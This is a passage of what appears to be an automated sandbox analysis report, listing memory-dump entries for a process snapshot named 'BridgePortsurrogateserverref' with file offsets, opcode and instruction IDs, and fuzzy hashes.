                                                    • Instruction Fuzzy Hash: DE316D7491D68EDFEB45DB68C8505BC7BB1FF5A300F4441BAD04EE7292CB28A909C791
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3da238601706099573add9f9f10715a5e12ea734c18764089e34d5afb0057056
                                                    • Instruction ID: 413d86a4e6af9e7eca65096f10fd26909f264d2662d54cdbaaa1fc459306ad15
                                                    • Opcode Fuzzy Hash: 3da238601706099573add9f9f10715a5e12ea734c18764089e34d5afb0057056
                                                    • Instruction Fuzzy Hash: 1131053491A94ACFFF98EF5484555BD77B1FF46700F9080BAD40ED3581DB38AA488B81
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d97b9b937c4710d42d81cac16a3662f8f12430d92532800a6bd8c2a368a92224
                                                    • Opcode Fuzzy Hash: b6e9184bb951a323ba06b0cbe3120140af5c2ccba6e93f82d2ea4fe5755e845e
                                                    • Instruction Fuzzy Hash: 70113734A1991D8FDF8CDB58C8A1ABDB3B0FF59310F0441BE900EE3691CE35AA848B40
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1700711479.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac580000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 822dfce3ca9ad7a2245bcee2ca0103a268a7c3aa5b99d523d11e3ac1be586702
                                                    • Instruction ID: 83272e6f31d301092e590375ff98eb32e615217906d04feb427694d3b6b85069
                                                    • Opcode Fuzzy Hash: 822dfce3ca9ad7a2245bcee2ca0103a268a7c3aa5b99d523d11e3ac1be586702
                                                    • Instruction Fuzzy Hash: 6301C435A4D60ACBF700EF78D4421BDB7E4EB92315F1485B2D049D7292E934A74997C0
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1700711479.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac580000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8322b6a226f07fc52449bacde2134a733e30bf8d632d693d3dfc983683bfdc87
                                                    • Instruction ID: 33549d60b47b524722da09b44b07d1a711904be1844999c46bf0defdd49fa952
                                                    • Opcode Fuzzy Hash: 8322b6a226f07fc52449bacde2134a733e30bf8d632d693d3dfc983683bfdc87
                                                    • Instruction Fuzzy Hash: 8D019235A4960ACBF700EF68D4451ADB7E4EB92315F1085B6D00997292EA34A74997C0
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1700711479.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac580000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 848ccc5de85023709d9cd6025aa56fad634fc08cc43135e6eeff86392d5b9a3c
                                                    • Instruction ID: 5d0cc09aef3eaaeca96b796e178daeae3754858ff11e91da983022a0bf612dbe
                                                    • Opcode Fuzzy Hash: 848ccc5de85023709d9cd6025aa56fad634fc08cc43135e6eeff86392d5b9a3c
                                                    • Instruction Fuzzy Hash: C911D635908929CFDF98DB04C895BE973F1EB59311F1441AA900EE7290CA34AA84CFC1
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 121f047cb16809247ee55a935fb3396e789aa3dd5402db97fd346e6f9fe57a63
                                                    • Instruction ID: c880a843a5aee133ee12f85ddeb008f24f454b26d63dd75f494c71ed6d016db2
                                                    • Opcode Fuzzy Hash: 121f047cb16809247ee55a935fb3396e789aa3dd5402db97fd346e6f9fe57a63
                                                    • Instruction Fuzzy Hash: E3014F3090894CCFCF98EF18C854FE477B0EB98315F0441A9D00DE7251CA319AC4CB81
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6b17d34d782b96023cb7b8a3a80e396503c593d642ed04d82ca0dcaedaa59391
                                                    • Instruction ID: eb0c624a24b8c625c9c42326bdeb11da3f3e3c1dc8917e7e6b874867c35c41c2
                                                    • Opcode Fuzzy Hash: 6b17d34d782b96023cb7b8a3a80e396503c593d642ed04d82ca0dcaedaa59391
                                                    • Instruction Fuzzy Hash: B5014F3090894CCFCF98EF58C858BE877B0EB98315F0440A9D40DE7251CA319AC4CF81
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1700711479.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac580000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6e06a2277df1d6f10b28df7167f9fe2778f4c7825776caf9934fafafc992acd2
                                                    • Instruction ID: beb62f9206ce8f24eadb08df7adceb587ecdda425a811e8667d89abf45caf8f8
                                                    • Opcode Fuzzy Hash: 6e06a2277df1d6f10b28df7167f9fe2778f4c7825776caf9934fafafc992acd2
                                                    • Instruction Fuzzy Hash: 01018F35D4924ADFE700EF78C4451ADBBE0EB92315F1481B6E009DB292EA34A74997C0
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1700711479.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac580000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 12b7923d9a762318a437c02b11bfd53bd061e3e8a4745209d086bd67930875f9
                                                    • Instruction ID: a6ceb6de5c71936ac6930a31b99f40fadb9c7d505ae95aacb6fbc353870841e6
                                                    • Opcode Fuzzy Hash: 12b7923d9a762318a437c02b11bfd53bd061e3e8a4745209d086bd67930875f9
                                                    • Instruction Fuzzy Hash: 1E016D31D9A41FCAFB54EB04C894AF962E5FF55300F1040F9E48ED3192CE28AAC59B90
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 26ddff08a47b066ee4b190e0972954bcababc5808358110e6b2bd9dee3f4be99
                                                    • Instruction ID: 97f5cfff55978c1a467ce26c0082f4679ada7ac7e5f47e47b6d34f648251dca6
                                                    • Opcode Fuzzy Hash: 26ddff08a47b066ee4b190e0972954bcababc5808358110e6b2bd9dee3f4be99
                                                    • Instruction Fuzzy Hash: A6F0813684E2C5DFE7168B7088115B53FA4AF03210B1841FAD44A8B0A2D66D5749C7A1
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4570d1ed9aea88977258ca4c323c310bec821b8e1e2dd2bee1e38a6e44b4ab8f
                                                    • Instruction ID: fa491b059c938faf7c785cb3ad6092709ecc5916de5ce88eb853ce376b6062f6
                                                    • Opcode Fuzzy Hash: 4570d1ed9aea88977258ca4c323c310bec821b8e1e2dd2bee1e38a6e44b4ab8f
                                                    • Instruction Fuzzy Hash: E9F0903544E2C9DFE7028B748C559E97FB4AF43214B1880E6E48AC70A2CA6D961AC7A1
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 40888f63d121f612d10db84ac640de85f9f69bc838e04a1594374503628eb8ea
                                                    • Instruction ID: d8adc82e24d1a11dc2652fc7065328a562718fa01fdb8538d5e23c01f130ce48
                                                    • Opcode Fuzzy Hash: 40888f63d121f612d10db84ac640de85f9f69bc838e04a1594374503628eb8ea
                                                    • Instruction Fuzzy Hash: 7FF0CD3684F2C69FE7028B7088115E93FA4AF03210B1840EAE44A8B0A2C62D974AC7E1
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 51308b3465836c77c90ebe9b6c92934f15cf4cebc56c82d03b01db0222b8e253
                                                    • Instruction ID: 1fd28a921b739ac5fc8a7fcf630aed6ffcdfc2f2cf43fdd51c4de21bb238ef14
                                                    • Opcode Fuzzy Hash: 51308b3465836c77c90ebe9b6c92934f15cf4cebc56c82d03b01db0222b8e253
                                                    • Instruction Fuzzy Hash: EEF0903A44F285DFE7029B7088568E53FB4EF43214F1941F6E499CB0A2CA2D961EC7A1
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d1dc3601835cf65a3d20cb87414acf28d6148d1abe0723631c77333282331f26
                                                    • Instruction ID: 65613a520c7b99936c74a19b418d16bf7f255bf0ceb04bade9c9401ade8879cd
                                                    • Opcode Fuzzy Hash: d1dc3601835cf65a3d20cb87414acf28d6148d1abe0723631c77333282331f26
                                                    • Instruction Fuzzy Hash: 12F0BE68A0F94BCEFB25672099011B927A0AF47341F24C476D50E834C2CD29EA4A43E7
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 41c34e37d5663b5bce2dd45fce4d0544f4c6cbfafaa13a12e00dbb9fb4ac4aa8
                                                    • Instruction ID: 7a60630d376c8e0f48d4e6f11980f0a0f0d233077e241d1fcba71a363d72fb4f
                                                    • Opcode Fuzzy Hash: 41c34e37d5663b5bce2dd45fce4d0544f4c6cbfafaa13a12e00dbb9fb4ac4aa8
                                                    • Instruction Fuzzy Hash: 42F0962690E7C68FEB129B748CD14B43F90DF1731070845F5C04E8B1D7D668661AC751
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1700711479.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac580000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c45606a07adad99113c19057f7e7381a24224dcb77937f7df8a2fae784e27ad8
                                                    • Instruction ID: b5b1bfa94f7f9926704750703f67b506441c4bbcef05bfbf875beb4a92e2035a
                                                    • Opcode Fuzzy Hash: c45606a07adad99113c19057f7e7381a24224dcb77937f7df8a2fae784e27ad8
                                                    • Instruction Fuzzy Hash: 84E0ED20E494178EF754A715C8557BA62A6AFC6300F1080B4E44D932C6CD38AE4997C5
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1700711479.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac580000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6b9a3223e6ddc4a6958513dd14ccbb747a8e771beb01e09551b7c8ebdd920da9
                                                    • Instruction ID: d2664e21e896dd36359ec71c2208737d5aac0d3fa8f511733eda47e8709369b8
                                                    • Opcode Fuzzy Hash: 6b9a3223e6ddc4a6958513dd14ccbb747a8e771beb01e09551b7c8ebdd920da9
                                                    • Instruction Fuzzy Hash: DEE01214E5D4078BF7A8A718944233522D5FF86300F5080B8F84FD22C7DD2CEA9967C6
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1700711479.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac580000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6c56228407230d6c202e65f249f4463cb1669881550548cb6ff8199dd53ba4d0
                                                    • Instruction ID: 6378b965677cadbde0524f61cddce35e7a22ff6d7ed7841608b5cd479b1b5c35
                                                    • Opcode Fuzzy Hash: 6c56228407230d6c202e65f249f4463cb1669881550548cb6ff8199dd53ba4d0
                                                    • Instruction Fuzzy Hash: E0D05E3159E98A8FE785A738D895864BBA0FE1B314B8910D6E04CC72A2E64589988701
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1700711479.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac580000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7fd17cfa7492068c805ebefb40a63ff3d0fa0b037bbffb4a05f9133323955010
                                                    • Instruction ID: a5bfe8a956bf41ab9e4b27acffbdd42aba3cdc97de466b142822d9a3c688a678
                                                    • Opcode Fuzzy Hash: 7fd17cfa7492068c805ebefb40a63ff3d0fa0b037bbffb4a05f9133323955010
                                                    • Instruction Fuzzy Hash: C1C0123055580D8FCA48EB28C884D2473A0FF5A304B9640D4E00DCB2A1D62AECC6CB80
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1700711479.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac580000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3dfa1af1c56f91da1015574c4b60a8f52908aa7700991219ecccf497ee18226c
                                                    • Instruction ID: 29d9db663ba74abd65d5f96e58737190aa12f587d28495023c44edc94d6b42e8
                                                    • Opcode Fuzzy Hash: 3dfa1af1c56f91da1015574c4b60a8f52908aa7700991219ecccf497ee18226c
                                                    • Instruction Fuzzy Hash: 81C08C01DCB50BC0B800336F18020BCA1885FC7220FE18032F00C800C59C0DA2CD23CA
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fc5592b4b21585cda837d83000725528b9a365598fb017d8982c24e17d96d338
                                                    • Instruction ID: 337414abd0d6ff340a000dd470f4b9492a348f819ec7086cc678f52577108b70
                                                    • Opcode Fuzzy Hash: fc5592b4b21585cda837d83000725528b9a365598fb017d8982c24e17d96d338
                                                    • Instruction Fuzzy Hash: D9D09258E0E647C5FA28870D816023E63A86F02701E60C43AD06F428C29A1CFA496781
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3b8d9ba272dd3897c3e20f0c975dca4aaf660934455dc13339c8d3136d4e8802
                                                    • Instruction ID: 58a436aafb1b40f7e4c7c4e367d10bfce3be5fd85b03d716d36a4b26189deb4a
                                                    • Opcode Fuzzy Hash: 3b8d9ba272dd3897c3e20f0c975dca4aaf660934455dc13339c8d3136d4e8802
                                                    • Instruction Fuzzy Hash: 30D0925AA0F50BC5F1784761802023913D14F06704E608139C09F4B8C68D19F7096381
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1700711479.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac580000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cc17e8052113a1f7cdb599daa3e5cbec2f1a36ef8d0eef4cdec2f1d803d3964f
                                                    • Instruction ID: c2da715242f031de3169c6ae7055eb9c9e1ec258471ff08079e9a409781d6784
                                                    • Opcode Fuzzy Hash: cc17e8052113a1f7cdb599daa3e5cbec2f1a36ef8d0eef4cdec2f1d803d3964f
                                                    • Instruction Fuzzy Hash: A5C08C00E2C81A8AF909A32480106BF00539F80308F564472F80FCB6CECE0C5E0207CA
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1700711479.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac580000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a7f99d765c7a884f7d75e1cfdec0ed63725cc9eb6b232b34d2388067146774d8
                                                    • Instruction ID: 62e84ae6ac24f6660d7ca526e62e461a03c4aac4f5e1de023feba7dc8ddef9f9
                                                    • Opcode Fuzzy Hash: a7f99d765c7a884f7d75e1cfdec0ed63725cc9eb6b232b34d2388067146774d8
                                                    • Instruction Fuzzy Hash: 87B01210CD740F80B804337A0C4207570885F86100FC15070F40CC0081984D52DC23C6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1700711479.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac580000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: c9$!k9$"s9$#{9
                                                    • API String ID: 0-1692736845
                                                    • Opcode ID: 67a6c2c74c737a0240dd919b89a3de95e777c46b856b360fdcd8166775f3ec20
                                                    • Instruction ID: 2823f4f9dc6c4ae76fd89fcd199acc8b734a54cdfb9435e673ef62eb93df35eb
                                                    • Opcode Fuzzy Hash: 67a6c2c74c737a0240dd919b89a3de95e777c46b856b360fdcd8166775f3ec20
                                                    • Instruction Fuzzy Hash: E241C963A0D56386E10637FDB422AFD6B44DFCA375B49CA77E04DC92E34E09608583D5